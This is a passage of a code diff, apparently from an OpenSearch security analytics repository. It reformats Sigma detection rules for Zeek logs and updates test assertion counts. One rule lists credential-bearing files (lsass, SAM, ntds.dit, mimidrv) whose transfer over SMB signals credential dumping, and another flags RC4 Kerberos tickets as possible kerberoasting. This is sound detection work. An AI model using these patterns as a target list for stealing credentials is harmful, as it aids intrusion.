credential data) using network shares -author: '@neu5ron, Teymur Kheirkhabarov, oscd.community' references: - - https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml + - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment +author: '@neu5ron, Teymur Kheirkhabarov, oscd.community' date: 2020/04/02 modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1003.002 + - attack.t1003.001 + - attack.t1003.003 logsource: - product: zeek - service: smb_files + product: zeek + service: smb_files detection: - selection: - name: - - '\mimidrv' - - '\lsass' - - '\windows\minidump\' - - '\hiberfil' - - '\sqldmpr' - - '\sam' - - '\ntds.dit' - - '\security' - condition: selection + selection: + name: + - '\mimidrv' + - '\lsass' + - '\windows\minidump\' + - '\hiberfil' + - '\sqldmpr' + - '\sam' + - '\ntds.dit' + - '\security' + condition: selection falsepositives: - - Transferring sensitive files for legitimate administration work by legitimate administrator + - Transferring sensitive files for legitimate administration work by legitimate administrator level: medium -tags: - - attack.credential_access - - attack.t1003.002 - - attack.t1003.001 - - attack.t1003.003 diff --git a/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml b/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml index d71b2ec56..5cc7d95f8 100644 --- a/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml +++ b/src/main/resources/rules/network/zeek/zeek_susp_kerberos_rc4.yml @@ -2,24 +2,24 @@ title: Kerberos Network Traffic RC4 Ticket Encryption id: 503fe26e-b5f2-4944-a126-eab405cc06e5 status: test description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting -author: sigma references: - - https://adsecurity.org/?p=3458 + - https://adsecurity.org/?p=3458 +author: sigma date: 2020/02/12 modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1558.003 logsource: - product: zeek - service: kerberos + product: zeek + service: kerberos detection: - selection: - request_type: 'TGS' - cipher: 'rc4-hmac' - computer_acct: - service|startswith: '$' - condition: selection and not computer_acct + selection: + request_type: 'TGS' + cipher: 'rc4-hmac' + computer_acct: + service|startswith: '$' + condition: selection and not computer_acct falsepositives: - - Normal enterprise SPN requests activity + - Normal enterprise SPN requests activity level: medium -tags: - - attack.credential_access - - attack.t1558.003 diff --git a/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java b/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java index e32f19371..0eb398475 100644 --- a/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java +++ b/src/test/java/org/opensearch/securityanalytics/mapper/MapperRestApiIT.java @@ -1725,7 +1725,7 @@ public void testAzureMappings() throws IOException { createDetector(detector); List hits = executeSearch(".opensearch-sap-azure-detectors-queries-000001", matchAllSearchBody); - Assert.assertEquals(60, hits.size()); + Assert.assertEquals(127, hits.size()); } public void testADLDAPMappings() throws IOException { @@ -1775,7 +1775,7 @@ public void testCloudtrailMappings() throws IOException { createDetector(detector); List hits = executeSearch(".opensearch-sap-cloudtrail-detectors-queries-000001", matchAllSearchBody); - Assert.assertEquals(32, hits.size()); + Assert.assertEquals(40, hits.size()); } public void testS3Mappings() throws IOException {